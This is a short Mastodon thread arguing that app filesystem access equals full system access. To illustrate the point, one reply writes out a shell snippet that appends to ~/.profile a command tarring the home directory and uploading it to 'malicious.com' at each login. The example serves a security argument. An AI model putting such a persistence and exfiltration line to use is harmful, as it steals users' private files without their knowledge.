@TheEvilSkeleton The claim about security is flat out wrong.

File system access *is* full access.

If you can write to the file system, you can write a script, mark it executable, and tweak ~/.profile etc to run it on startup. This doesn't even require being able to mark a file executable, because you can simply add e.g. 'python malicious.py' to the end of the login script.

@pixelherodev could you explain how filesystem access can access my Nextcloud information like contacts and notes?


@TheEvilSkeleton cat >>$home/.profile <<EOF
tar cz . | curl -X POST malicious.com/extract.tar&

Now, every time you log in, your entire home folder will be tarballed up and uploaded to some malicious server.

This is just a trivial example, a more sophisticated system would hide itself, and wouldn't be so obvious as to what it was doing.

Sign in to participate in the conversation

Fosstodon is an English speaking Mastodon instance that is open to anyone who is interested in technology; particularly free & open source software.